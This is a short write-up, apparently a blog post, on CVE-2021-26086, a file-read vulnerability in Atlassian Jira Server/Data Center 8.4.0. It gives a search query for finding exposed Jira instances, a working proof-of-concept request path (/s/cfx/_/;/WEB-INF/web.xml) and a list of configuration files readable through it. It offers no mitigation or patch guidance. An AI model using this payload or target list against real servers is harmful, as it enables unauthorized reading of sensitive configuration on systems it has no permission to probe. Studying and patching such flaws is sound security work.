Atlassian Jira Cfx Arbitrary File Reading Vulnerability Cve 2021 26086
Atlassian Jira Cfx Arbitrary File Reading Vulnerability Cve 2021 26086
Atlassian Jira cfx arbitrary file reading vulnerability CVE-2021-26086
Vulnerability Description
Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include
Vulnerability Impact
Atlassian Jira Server/Data Center 8.4.0
Network surveying and mapping
app=”ATLASSIAN-JIRA”
Vulnerability reappears
Login page
Verify POC
1
/s/cfx/_/;/WEB-INF/web.xml
Readable sensitive configuration files
1
2
3
4
5
6
7
WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
This post is licensed under CC BY 4.0 by the author.